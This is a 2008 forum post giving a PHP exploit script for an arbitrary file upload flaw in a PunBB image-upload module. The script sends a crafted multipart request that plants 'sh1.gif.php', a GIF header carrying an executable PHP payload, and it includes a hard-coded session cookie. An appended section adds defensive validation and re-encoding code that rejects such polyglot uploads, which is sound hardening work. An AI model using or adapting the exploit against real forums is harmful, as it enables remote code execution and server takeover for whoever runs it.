
17.06.2008, 18:09
PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitrary file upload
PHP code:
<?php
# PunBB module Automatic Image Upload with Thumbnails <= 1.3.4 arbitrary file upload
# h3ck.[rv.ua], 2008
$host = 'localhost'; # host
$path = '/punbb/'; # path to the forum
$file_type = 'image/gif';
$file_name = 'sh1.gif.php'; # name of the new file
$file_code = '<?php phpinfo(); ?>'; # code that will be executed
$cookie = 'punbb_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%222%22%3Bi%3A1%3Bs%3A32%3A%220b9ca83006024ac122e2b1c459c0804f%22%3B%7D'; # will not work without authentication
$file_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
$post_data = <<<POST
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="form_sent"
1
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="imagefile"; filename="$file_name"
Content-Type: $file_type
${file_content}${file_code}
------------9cYrkcaQ3YTUyzCSnL8xD2
Content-Disposition: form-data; name="uploadimg"
Submit
------------9cYrkcaQ3YTUyzCSnL8xD2--
POST;
$post_len = strlen($post_data);
$req = <<<REQ
POST http://${host}${path}uploadimg.php?subpage=upload HTTP/1.0
User-Agent: Opera/9.27 (Windows NT 5.1; U; ru)
Host: $host
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: uk-UA,uk;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: $cookie
Content-Length: $post_len
Content-Type: multipart/form-data; boundary=----------9cYrkcaQ3YTUyzCSnL8xD2
Connection: Close
$post_data
REQ;
$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) { echo "$errstr ($errno)<br />\n"; }
else {
echo "Sending... <pre>$req</pre>\n";
fwrite($fp, $req);
while (!feof($fp)) { echo fgets($fp); }
fclose($fp);
}
?>
Last edited by Elekt; 03.09.2008 at 04:08.
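
Added example, not part of the original post or of the module's code: server-side checks that would refuse the upload built above (`sh1.gif.php`, declared as `image/gif`, valid GIF header followed by PHP). The function and constant names are hypothetical, and it assumes the fileinfo and GD extensions are available; the post does not say which check the module itself gets wrong.

```php
<?php
// Added defensive example with hypothetical names; needs fileinfo and GD.

// Detected MIME type => [extension to store under, GD encoder function].
const ALLOWED_TYPES = [
    'image/gif'  => ['gif', 'imagegif'],
    'image/png'  => ['png', 'imagepng'],
    'image/jpeg' => ['jpg', 'imagejpeg'],
];

// Returns [server-chosen file name, re-encoded bytes], or null to reject.
function sanitize_image_upload(string $clientName, string $bytes): ?array
{
    // 1. Type comes from the content, never from the request's Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if (!isset(ALLOWED_TYPES[$mime])) {
        return null;
    }
    [$ext, $encode] = ALLOWED_TYPES[$mime];
    // 2. The last extension must agree with the detected type.
    $given = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($given !== $ext && !($given === 'jpeg' && $ext === 'jpg')) {
        return null;
    }
    // 3. A valid header says nothing about trailing bytes: decode and re-encode.
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return null;
    }
    imagesavealpha($img, true);
    ob_start();
    $ok = $encode($img);
    $clean = ob_get_clean();
    if (!$ok) {
        return null;
    }

    // 4. The stored name is generated server-side; the client's name is discarded.
    return [bin2hex(random_bytes(16)) . '.' . $ext, $clean];
}

// Constructed input: the 1x1 GIF from the post with its PHP snippet appended.
$gif = base64_decode('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==');
$polyglot = $gif . '<?php phpinfo(); ?>';
$a = sanitize_image_upload('sh1.gif.php', $polyglot);   // file name as sent in the post
$b = sanitize_image_upload('sh1.gif', $polyglot);       // same bytes, image extension
var_dump($a === null, $b !== null && strpos($b[1], '<?php') === false);
```

Storing the returned bytes outside the web root, or in a directory where the web server never hands files to the PHP interpreter, covers the case where one of these checks is bypassed.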